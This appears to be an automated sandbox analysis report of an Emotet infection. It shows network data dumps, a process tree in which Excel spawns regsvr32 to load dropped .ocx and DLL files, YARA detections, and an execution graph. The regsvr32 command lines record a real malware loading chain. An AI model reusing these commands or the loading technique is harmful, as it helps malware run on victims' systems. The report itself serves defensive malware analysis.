                                                                  2022-05-23 07:56:39 UTC208INData Raw: 5f c9 f7 76 d4 28 38 c2 dd a4 8e 6d ee 30 2e fb 51 5a a3 dc 22 68 c7 0b 36 4d 5b 56 48 bd 00 36 8f 6b 8b 08 de 0c 6e d5 19 3e 1b ab 1d 4f 80 56 8d 09 ab 70 89 72 01 41 6a 0d 1d ba 3b ee 3d 95 e2 06 9d b8 d9 5f 65 f6 50 c3 75 e5 1e 98 c7 cf f7 b5 92 7c 7c c0 2b a9 4e b0 2e 7d 68 94 c3 b2 b0 03 71 2c 71 fa 79 ae 1d 43 2b 7e e8 68 c9 5f 75 81 e6 7e bc f7 36 26 7a c6 b0 d1 82 37 64 13 1e 14 43 a3 51 75 5d e4 7a 36 04 dc 88 a5 e6 10 22 ee 4f a1 f6 e0 6e 6b 89 0a 15 0b 22 d3 0d 13 05 b8 32 42 18 af 1a 72 e0 1c 74 63 e4 6c 60 c1 6e 42 1a da 29 26 ff 07 11 41 22 ed 5e 0d fb 23 5c 42 e8 06 75 70 fd 1a 9a 7b be 31 27 5a 69 67 ee 74 7d af 18 36 26 a0 21 40 c7 75 4f 4a b6 37 54 4c 31 b1 23 4f e5 90 ae 69 e2 51 2b 6f 2a e9 0d 25 9d cd ae 93 b4 03 4c 89 16 bd 66 d3 08
                                                                  Data Ascii: _v(8m0.QZ"h6M[VH6kn>OVprAj;=_ePu||+N.}hq,qyC+~h_u~6&z7dCQu]z6"Onk"2Brtcl`nB)&A"^#\Bup{1'Zigt}6&!@uOJ7TL1#OiQ+o*%Lf
                                                                  2022-05-23 07:56:39 UTC224INData Raw: 7a 7e b4 35 fb 20 a3 d2 b2 96 21 fb 51 92 d6 cf 5c e9 c1 2b f6 61 eb 1b 8f de 49 ce 89 e7 35 e3 ae ea a8 49 97 6e bc 79 aa 20 2a ed 17 82 9b d4 ce 66 7c e3 4e a7 b2 41 fb 32 ab eb 26 90 ae b9 76 5f e4 42 e6 c0 ab 4a e0 e6 10 f2 1d 83 72 b2 ac 6e b3 27 50 13 6b ab 33 93 39 cc 44 ad 6c 8e 5d bb b8 0c 83 53 aa 1a f1 3a 65 e7 45 9d 14 bb d9 e0 b8 35 b0 0f b1 5a c4 3f b0 0d 6f 32 45 e9 79 a1 a8 84 1c ff ed 8c 67 a1 2e ee f6 bb cd 57 b0 26 fc e9 75 99 8e 3d 4d 5f 8f 79 86 47 d0 1a 40 a5 12 b2 26 93 2a 83 ee 6f a3 d8 31 66 5a d0 19 fe 73 60 4e d9 e1 23 97 cc 36 43 20 e1 26 a0 eb 70 52 17 ee 72 fe b5 21 40 2b ec 20 f6 f3 60 71 01 e0 6e b3 89 0a 15 5b 65 e9 0d 7b 2b b8 32 42 68 af 1a aa 2d d3 1d ec e6 6e 4c 68 c2 be c8 51 6c 79 fd a3 7d 86 b2 7d 83 c4 91 79 9c 93
                                                                  Data Ascii: z~5 !Q\+aI5Iny *f|NA2&v_BJrn'Pk39Dl]S:eE5Z?o2Eyg.W&u=M_yG@&*o1fZs`N#6C &pRr!@+ `qn[e{+2Bh-nLhQly}}y
                                                                  2022-05-23 07:56:39 UTC240INData Raw: 3c 65 6f ea ea b5 21 7a 24 6f f3 f7 64 e9 b5 9e 31 6b 6a 25 96 a0 02 ba f3 b6 40 24 5f 38 e2 86 d9 6e 8b c3 d8 a6 d5 99 9d d4 b4 35 76 43 5b 95 1a 66 e0 7c f3 74 40 eb e6 9b 62 34 76 3c 68 c8 ca bd d0 bc 6b 67 65 fe f5 1d a7 b8 de f3 68 00 4e 67 34 30 ac 8f b9 9d 31 76 66 53 8f 04 79 e2 d5 80 2b 6f 2a 9f a9 01 ac e2 4e e9 de 27 92 dc 72 a0 a7 b1 43 fb ea a8 6a 63 43 e3 b9 a6 5f 65 37 f3 1a 40 11 e0 ea b5 21 7a 24 a2 d8 aa c1 6c b8 87 73 7d d8 d7 dd ec 4d 31 76 e7 f5 f4 5f 79 69 f7 44 74 6d ed ed a0 2a 66 5a f4 01 65 76 c8 b8 99 6a 66 58 b2 93 df 37 86 a7 0d a3 de 73 d6 f0 df 35 3c 65 e5 de 8f 65 21 7a 63 02 31 6b ec ed e0 4e 31 6b c2 d0 b9 3c c6 bc 96 66 40 24 a8 98 21 d5 15 73 ae c0 6b 00 a3 22 7e 71 e5 a0 96 43 35 71 eb d3 b8 45 72 67 83 4d 68 43 26 bf
                                                                  Data Ascii: <eo!z$od1kj%@$_8n5vC[f|t@b4v<hkgehNg401vfSy+o*N'rCjcC_e7@!z$ls}M1v_yiDtm*fZevjfX7s5<ee!zc1kN1k<f@$!sk"~qC5qErgMhC&
                                                                  2022-05-23 07:56:39 UTC256INData Raw: e6 20 39 1f af 55 39 ea 5e 70 9e 61 4d 6d e1 1b 50 b5 08 dd b1 23 58 f6 6e bf 69 d3 1d 33 2e a1 a8 bf cb a7 b0 57 e5 60 6e c2 78 69 c2 09 0b aa f3 22 60 33 64 bc 9d b5 03 47 3d 0a de 83 ee 21 73 ee 20 c9 bd 61 7d 20 da fe 68 c1 23 19 6e ab 3b 60 2c cc 44 5e 65 40 ac f2 be 2c 40 10 a1 0f 2a a9 2d 32 6f 31 14 74 4c ff 06 2d fa 27 7e e0 08 e3 a8 c2 9d 82 68 a8 75 fd 9f b4 de 36 f6 a4 8d 6e ee 28 39 fb 51 4d 0c 00 e6 69 c7 0b 11 8a 75 6c 48 bd 00 11 06 cf e5 41 de 3c 49 62 02 2b 6f ab 1d 68 6f bd 3e 16 ab 70 92 c9 3e 33 6a e7 15 a1 39 18 1a b5 a2 2e 86 39 f7 2a 81 3d 20 3f 65 a3 2e 87 73 11 7b 24 de 74 8b dc 89 c1 a4 37 e2 3f be c9 49 ad 58 a2 06 6d a5 2a 99 1f 01 31 06 a8 6f 78 45 3a 95 5a d0 19 25 e1 0e 39 ae bb 0b 48 84 17 77 72 eb 16 53 45 71 c8 a1 ee 72
                                                                  Data Ascii: 9U9^paMmP#Xni3.W`nxi"`3dG=!s a} h#n;`,D^e@,@*-2o1tL-'~hu6n(9QMiulHA<Ib+oho>p>3j9.9*= ?e.s{$t7?IXm*1oxE:Z%9HwrSEqr
                                                                  2022-05-23 07:56:39 UTC272INData Raw: a7 31 1d 2b 2b 5b d2 06 b8 07 4e 66 00 b5 31 15 46 22 cd 6e 5c 3d e4 1a 60 62 e4 e4 e1 3c 0e 4e 12 d8 30 11 56 bc e5 3d e7 fa 7c e5 72 67 78 23 e8 18 42 7d fd 34 55 7e be df 24 3a 34 39 a6 ed b6 e8 dc 75 4f 23 3d 53 18 66 2a 3c 16 c5 50 69 f8 3e e7 ac e4 5f 79 69 9f 15 44 9a 82 6d 48 ed 23 29 05 9f 32 76 06 06 87 22 ed 2d 2a cd 46 85 64 63 c2 9d 50 50 5e 65 38 b1 d5 65 64 6b e6 9a aa e3 25 55 36 ef 1f 6b 00 4e b0 94 da 98 4d 3c 42 b5 df 66 40 24 de 86 9e 5d 5b 2b 1b 39 e9 b7 0b 9b 54 51 63 b0 75 40 35 71 d5 d6 9e 40 72 8c b9 ad 26 34 ed d4 c3 5f 2d be 41 18 45 e5 2e 10 07 b4 85 db d4 7c 1c 7f 78 00 4e b0 1e 1d 36 b1 8e 4d f6 33 09 21 12 7f 79 02 1d 3f 77 e6 6f 07 23 6f 09 36 d8 29 5a ce 88 5e 59 c5 e7 2d 2a 0a c6 4d 88 a4 06 05 b1 d1 b8 65 b6 40 5b 63 f3
                                                                  Data Ascii: 1++[Nf1F"n\=`b<N0V=|rgx#B}4U~$:49uO#=Sf*<Pi>_yiDmH#)2v"-*FdcPP^e8edk%U6kNM<Bf@$][+9TQcu@5q@r&4_-AE.|xN6M3!y?wo#o6)Z^Y-*Me@[c
                                                                  2022-05-23 07:56:39 UTC288INData Raw: 2b af 85 5e 30 6b 6a c1 5f 14 4d b0 fb 76 41 24 5f cd ae 27 fb 63 0c e2 24 c3 ed e7 df 41 6d 35 76 1d 42 71 6a 2e 5b b4 b3 ca 68 6b 63 43 65 b5 c3 4f 64 37 35 9f 1e 35 6a a0 e0 39 7b 24 55 75 57 e9 68 81 c3 29 6a 6a 5e 2c 72 a4 4e b7 cb 58 25 5f 79 6c d9 e5 33 6e 2a 68 35 89 99 59 da f9 2d 77 43 35 fa e7 76 59 45 72 8f a3 a8 63 43 2a bf eb 57 64 37 35 7d 4e 90 27 ee 46 a8 09 2c bc 10 66 2b 68 c7 cb 21 6a 6a 5e e2 23 6f 31 ce cd ea 8e f5 f2 e4 48 51 2b 6f dd 89 89 c0 64 d3 c4 7c 34 76 43 b6 f4 7a 67 58 45 81 0c fd 7a 62 43 62 1a ff da 75 36 35 3c e4 d1 7b 66 65 21 82 fe 50 38 2f a0 dd 10 4f 31 6b ad 1a 6c 50 df 15 00 66 c1 60 7b 15 66 70 50 2b 2e a1 a6 c9 5e 42 36 30 c4 47 76 84 71 55 0a 19 3d 17 72 a6 1c 4e 03 53 e3 40 52 3f af 2b 4b 59 a2 e1 73 66 65 21
                                                                  Data Ascii: +^0kj_MvA$_'c$Am5vBqj.[hkcCeOd755j9{$UuWh)jj^,rNX%_yl3n*h5Y-wC5vYErcC*Wd75}N'F,f+h!jj^#o1HQ+od|4vCzgXEzbCbu65<{fe!P8/O1klPf`{fpP+.^B60GvqU=rNS@R?+KYsfe!
                                                                  2022-05-23 07:56:39 UTC304INData Raw: bc 6e aa 93 b7 c3 05 b8 f7 ae 41 24 5f 31 e4 5d 1a 2a 91 d5 20 c1 ab be 5a 51 6c 7d fb 46 75 f5 94 99 10 cc f3 9f 78 6a 63 0b ef 31 20 0e 9a c8 7d b5 e4 64 69 67 65 69 f7 21 29 57 6b 2b 20 89 cf 99 6a 6a 5e 00 b1 48 ff 25 66 40 6c d6 f8 29 59 50 2b 27 a7 6d 9c 11 98 a5 19 e5 74 4e 0b b8 74 eb 5e a6 ba 3a ee f9 8a 62 43 62 7c fb 5a ba 7e cb c3 2d ed ea 77 67 21 7a 6c d8 3c 46 fd 96 ff 06 b8 ea fa 5e 48 3c 05 bc 73 71 52 da a0 31 e0 d9 a8 2a 6f 2a 20 c5 2f 1b 2a 51 6c 7d ff c2 3d 73 6a 66 10 c8 77 68 b6 95 9c 0b eb b5 4e 5e 65 37 7d b1 60 55 ea 99 9a 69 f3 a5 8d 38 6b 2b 20 8d 4b fe 40 94 a1 00 b5 cc 99 76 66 40 6c d2 7c 2c 3b af d4 27 a3 e9 18 2b 66 5a 19 e1 30 7d 30 ca 8e 22 ef d9 e5 72 67 78 22 ee 46 73 61 76 5f 2d be b4 ec 65 64 6b 2f e8 24 85 08 ab c6
                                                                  Data Ascii: nA$_1]* ZQl}Fuxjc1 }digei!)Wk+ jj^H%f@l)YP+'mtNt^:bCb|Z~-wg!zl<F^H<sqR1*o* /*Ql}=sjfwhN^e7}`Ui8k+ K@vf@l|,;'+fZ0}0"rgx"Fsav_-edk/$
                                                                  2022-05-23 07:56:39 UTC320INData Raw: 48 7d c6 eb b1 22 64 40 76 04 62 58 b8 9e 9b d7 97 05 a1 a9 16 da ab be a5 0b be bf 22 ef f4 61 ca 67 78 6a 2f ca d6 10 c6 5f 65 37 79 b1 39 40 1b 2e ee 7a 5a 6d de 52 43 62 e3 73 7e 78 e0 89 1f 17 7d 13 6e 3e 99 a0 e8 93 f0 3d 7c 40 a2 23 0e 60 1d 62 ed b6 19 ef d9 16 84 70 69 76 fb 59 45 b5 22 60 2e 54 63 62 bf 33 47 e8 3b 75 3f ac ed 26 7f e4 54 62 c3 70 d1 6d a0 2d 18 c7 74 87 ad 1b 50 59 44 8a 76 ed 0d 3c e7 fe 08 40 d6 dc 8e 01 a2 99 c3 65 90 90 85 33 ff 0e 2d f0 1f 7e 2e 0a 5a 5e f3 2f 7b ca 27 c4 b1 1a 7d ca 9a 8d 65 0f 2e 7f 1f a8 3f 3c d4 4c 73 ec c9 9c 1a ba 2e 72 d7 0d d4 8a 74 56 f2 cf 39 5f c1 b2 32 a0 37 ee 67 48 a1 f3 c1 ca d0 19 15 88 9c 8a e1 ad 23 40 a0 71 f9 78 e1 2e 5b 95 d5 5d 95 b4 de 36 f6 a4 8d 6d ee 28 39 bb 41 4d 30 ea 66 70 a8
                                                                  Data Ascii: H}"d@vbX"agxj/_e7y9@.zZmRCbs~x}n>=|@#`bpivYE"`.Tcb3G;u?&Tbpm-tPYDv<@e3-~.Z^/{'}e.?<Ls.rtV9_27gH#@qx.[]6m(9AM0fp
                                                                  2022-05-23 07:56:39 UTC336INData Raw: 52 6e 15 6c d4 95 21 db bc 5b a8 6f 78 20 7e 6b 5a 96 29 25 28 0b 93 71 e1 2b 48 fd 83 97 88 9a 94 a2 a3 de 73 d6 30 27 b4 49 75 fb c0 0b 6b aa 3f 34 dc 7c 83 ec 2d 10 c7 e9 21 6a df 0d 2c d7 3b 76 66 c1 51 4f c0 93 55 70 a0 2a 3a e1 0d f2 a1 1f 41 a5 2a fb 43 be 3c 7a de 61 cb 91 5f 8f 8b b2 a9 eb 61 66 de 10 27 f6 cd 1b e0 ea 2a 75 40 90 ad 8d b8 1e 3b 43 f2 df c9 e0 2f 4e c1 79 91 f6 33 76 ec c7 a1 79 a8 3d 40 27 ee 5f 78 92 f8 22 c6 da 29 25 ff 06 d1 b6 2f 76 96 29 ab 67 f9 2f 73 1b 80 cb 89 de 20 27 2f a0 9a 9b aa 0a 75 2f fb 51 45 97 31 02 14 8b 0b 21 e2 2f be 8f 79 5d 79 89 76 40 a5 12 69 59 58 d9 3c ee 5f 78 aa cc c6 3f da 29 25 ff 06 d9 b6 2f 76 f6 8d 46 67 a9 0f 73 c2 17 24 b0 d7 b3 02 be 79 75 ed 2e 97 a2 64 aa d8 90 b0 6b ea 05 d0 46 b0 1e ba
                                                                  Data Ascii: Rnl![ox ~kZ)%(q+Hs0'Iuk?4|-!j,;vfQOUp*:A*C<za_af'*u@;C/Ny3vy=@'_x")%/v)g/s '/u/QE1!/y]yv@iYX<_x?)%/vFgs$yu.dkF
                                                                  2022-05-23 07:56:39 UTC352INData Raw: 5f 79 98 86 50 2b 8b e9 6a 48 de b8 5a 51 43 d4 76 43 75 b2 68 66 68 a4 72 67 a9 8f 63 43 92 f7 74 5f b1 d2 35 3c 5a 83 6b 67 11 e0 78 24 15 de 6b 2b 89 e7 4e 31 63 ae 5c 48 d8 aa 31 76 83 a8 24 5f 5d a9 5a 50 c3 87 2a 68 d2 c3 66 5a 69 ae 37 76 df dc 71 6a 41 aa 45 72 73 bc 68 63 6b 90 34 76 77 96 37 35 20 a7 66 6b 4f 96 21 7a 11 a0 39 6b 0f ac 02 4e 65 9e 6a 5e ad c2 4d 31 36 a2 42 24 b7 87 69 58 ed d4 6f 2a 3c 8c 28 66 9a ae 6c 35 5d 5e 34 71 0a a2 5a 45 5e 7a 79 6a 91 5e 63 34 02 9b 67 37 c1 21 64 64 9e 79 64 21 fa e0 57 39 93 35 69 00 0a 11 6a 6a ce 8c 3e 4d 75 56 67 40 4c 7e 78 69 f8 90 29 6f 42 49 49 2a 11 79 50 6c 91 b2 41 35 09 49 67 58 b1 56 66 78 d2 a7 41 62 34 53 5e 65 49 13 3d 65 10 aa 65 65 a1 5c 25 55 81 4c 2a 68 68 8c 33 6b d2 79 49 3c 29
                                                                  Data Ascii: _yP+jHZQCvCuhfhrgcCt_5<Zkgx$k+N1c\H1v$_]ZP*hfZi7vqjAErshck4vw75 fkO!z9kNej^M16B$iXo*<(fl5]^4qZE^zyj^c4g7!ddyd!W95ijj>MuVg@L~xi)oBII*yPlA5IgXVfxAb4S^eI=eee\%UL*hh3kyI<)


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:09:57:12
                                                                  Start date:23/05/2022
                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                  Imagebase:0x13f300000
                                                                  File size:28253536 bytes
                                                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:3
                                                                  Start time:09:57:21
                                                                  Start date:23/05/2022
                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx
                                                                  Imagebase:0xff510000
                                                                  File size:19456 bytes
                                                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.914158918.00000000003E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high

                                                                  Target ID:4
                                                                  Start time:09:57:22
                                                                  Start date:23/05/2022
                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PlMfP\OpoHHoBHS.dll"
                                                                  Imagebase:0xff510000
                                                                  File size:19456 bytes
                                                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.1248680431.0000000000160000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.1249251446.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high

                                                                  Target ID:5
                                                                  Start time:09:57:23
                                                                  Start date:23/05/2022
                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx
                                                                  Imagebase:0xff510000
                                                                  File size:19456 bytes
                                                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.919789550.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.919412326.0000000000140000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high

                                                                  Target ID:6
                                                                  Start time:09:57:23
                                                                  Start date:23/05/2022
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                  Imagebase:0xff7d0000
                                                                  File size:27136 bytes
                                                                  MD5 hash:C78655BC80301D76ED4FEF1C1EA40A7D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate

                                                                  Target ID:7
                                                                  Start time:09:57:25
                                                                  Start date:23/05/2022
                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AVQhDTOoTQ\JuebGslFXTeyRNG.dll"
                                                                  Imagebase:0xff510000
                                                                  File size:19456 bytes
                                                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1248874495.0000000000510000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1249180337.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high

                                                                  Target ID:8
                                                                  Start time:09:57:28
                                                                  Start date:23/05/2022
                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx
                                                                  Imagebase:0xff510000
                                                                  File size:19456 bytes
                                                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.930405356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.930201138.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high

                                                                  Target ID:9
                                                                  Start time:09:57:30
                                                                  Start date:23/05/2022
                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IWJyiUbrMYkKNab\HrQqTfHWMtY.dll"
                                                                  Imagebase:0xff510000
                                                                  File size:19456 bytes
                                                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.1249191933.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.1248687990.0000000000140000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high

                                                                  Target ID:11
                                                                  Start time:09:57:51
                                                                  Start date:23/05/2022
                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx
                                                                  Imagebase:0xff510000
                                                                  File size:19456 bytes
                                                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:6.7%
                                                                    Dynamic/Decrypted Code Coverage:2.5%
                                                                    Signature Coverage:10%
                                                                    Total number of Nodes:1905
                                                                    Total number of Limit Nodes:30
                                                                    execution_graph 16679 7fef9d30215 16680 7fef9d30231 16679->16680 16684 7fef9d30302 16679->16684 16750 7fef9d38c80 16680->16750 16682 7fef9d30489 16770 7fef9d32d80 16682->16770 16687 7fef9d3040d 16684->16687 16757 7fef9d38c30 16684->16757 16685 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16688 7fef9d3027e OutputDebugStringW 16685->16688 16687->16682 16690 7fef9d31640 17 API calls 16687->16690 16691 7fef9d30296 OutputDebugStringW OutputDebugStringW OutputDebugStringW OutputDebugStringW 16688->16691 16689 7fef9d304a3 16692 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16689->16692 16695 7fef9d3045c 16690->16695 16703 7fef9d302f2 16691->16703 16693 7fef9d304d0 16692->16693 16698 7fef9d3053d 16693->16698 16699 7fef9d32d80 17 API calls 16693->16699 16705 7fef9d30583 16693->16705 16697 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16695->16697 16697->16682 16700 7fef9d32d80 17 API calls 16698->16700 16701 7fef9d30510 16699->16701 16702 7fef9d30556 16700->16702 16707 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16701->16707 16708 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16702->16708 16709 7fef9d23280 __GSHandlerCheck 8 API calls 16703->16709 16704 7fef9d30357 16706 7fef9d303af 16704->16706 16710 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16704->16710 16783 7fef9d31590 16705->16783 16706->16687 16760 7fef9d31640 16706->16760 16707->16698 16708->16705 16712 7fef9d30cae 16709->16712 16710->16706 16714 7fef9d303e0 16715 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16714->16715 16715->16687 16716 7fef9d305fa 16717 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16716->16717 16718 7fef9d30652 16716->16718 16717->16718 16719 7fef9d31640 17 API calls 16718->16719 16721 7fef9d306b0 16718->16721 16720 7fef9d30683 16719->16720 16722 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16720->16722 16723 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16721->16723 16722->16721 16724 7fef9d30769 16723->16724 16725 7fef9d2d490 std::exception::_Copy_str 17 API calls 16724->16725 16740 7fef9d307bd 16724->16740 16726 7fef9d30790 16725->16726 16727 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16726->16727 16727->16740 16728 7fef9d30905 16728->16703 16729 7fef9d30a26 16728->16729 16730 7fef9d309a4 GetFileType 16728->16730 16731 7fef9d30ba5 16729->16731 16732 7fef9d30b97 OutputDebugStringW 16729->16732 16734 7fef9d309d0 16730->16734 16738 7fef9d309ce 16730->16738 16731->16703 16735 7fef9d30c23 16731->16735 16736 7fef9d38c80 _itow_s 17 API calls 16731->16736 16732->16731 16737 7fef9d309dd WriteConsoleW 16734->16737 16787 7fef9d2b470 16735->16787 16739 7fef9d30bf6 16736->16739 16737->16729 16741 7fef9d30a2b GetLastError 16737->16741 16742 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16738->16742 16743 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16739->16743 16740->16728 16786 7fef9d29360 LeaveCriticalSection 16740->16786 16741->16729 16741->16738 16745 7fef9d30ab5 16742->16745 16743->16735 16746 7fef9d30b26 WriteFile 16745->16746 16747 7fef9d30ad0 16745->16747 16746->16729 16749 7fef9d30add WriteFile 16747->16749 16749->16729 16751 7fef9d38cd3 16750->16751 16752 7fef9d38ca6 16750->16752 16754 7fef9d38d00 _itow_s 17 API calls 16751->16754 16752->16751 16753 7fef9d38cad 16752->16753 16813 7fef9d38d00 16753->16813 16756 7fef9d30251 16754->16756 16756->16685 16829 7fef9d386b0 16757->16829 16759 7fef9d38c74 16759->16704 16761 7fef9d31661 16760->16761 16762 7fef9d316c2 16761->16762 16763 7fef9d31700 _calloc_dbg_impl 16761->16763 16765 7fef9d2bd70 _invalid_parameter 17 API calls 16762->16765 16764 7fef9d31832 _calloc_dbg_impl 16763->16764 16767 7fef9d317f4 16763->16767 16766 7fef9d316f6 _calloc_dbg_impl 16764->16766 16769 7fef9d2bd70 _invalid_parameter 17 API calls 16764->16769 16765->16766 16766->16714 16768 7fef9d2bd70 _invalid_parameter 17 API calls 16767->16768 16768->16766 16769->16766 16771 7fef9d32da1 16770->16771 16772 7fef9d32e02 16771->16772 16774 7fef9d32e40 _calloc_dbg_impl 16771->16774 16773 7fef9d2bd70 _invalid_parameter 17 API calls 16772->16773 16777 7fef9d32e36 _calloc_dbg_impl 16773->16777 16775 7fef9d32f34 16774->16775 16776 7fef9d32f72 _calloc_dbg_impl 16774->16776 16778 7fef9d2bd70 _invalid_parameter 17 API calls 16775->16778 16779 7fef9d330b5 16776->16779 16781 7fef9d330f3 _calloc_dbg_impl 16776->16781 16777->16689 16778->16777 16780 7fef9d2bd70 _invalid_parameter 17 API calls 16779->16780 16780->16777 16781->16777 16782 7fef9d2bd70 _invalid_parameter 17 API calls 16781->16782 16782->16777 16784 7fef9d386b0 _wcsftime_l 17 API calls 16783->16784 16785 7fef9d315de 16784->16785 16785->16716 16786->16728 16788 7fef9d2b48d 16787->16788 16789 7fef9d2b4ce GetModuleFileNameW 16788->16789 16790 7fef9d2b4c4 16788->16790 16791 7fef9d2b4f2 16789->16791 16797 7fef9d2b538 16789->16797 16793 7fef9d23280 __GSHandlerCheck 8 API calls 16790->16793 16792 7fef9d31640 17 API calls 16791->16792 16794 7fef9d2b50b 16792->16794 16795 7fef9d2ba58 16793->16795 16796 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16794->16796 16795->16703 16796->16797 16801 7fef9d2b5f2 16797->16801 16851 7fef9d30fd0 16797->16851 16799 7fef9d2b5c5 16800 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16799->16800 16800->16801 16802 7fef9d31590 _snwprintf_s 17 API calls 16801->16802 16803 7fef9d2b940 16802->16803 16804 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16803->16804 16805 7fef9d2b998 16803->16805 16804->16805 16806 7fef9d31640 17 API calls 16805->16806 16809 7fef9d2b9f6 16805->16809 16807 7fef9d2b9c9 16806->16807 16808 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16807->16808 16808->16809 16809->16790 16861 7fef9d2cff0 16809->16861 16815 7fef9d38d25 16813->16815 16814 7fef9d38d7b 16816 7fef9d2bd70 _invalid_parameter 17 API calls 16814->16816 16815->16814 16817 7fef9d38db9 16815->16817 16826 7fef9d38daf 16816->16826 16818 7fef9d38e1a 16817->16818 16820 7fef9d38e58 _calloc_dbg_impl 16817->16820 16819 7fef9d2bd70 _invalid_parameter 17 API calls 16818->16819 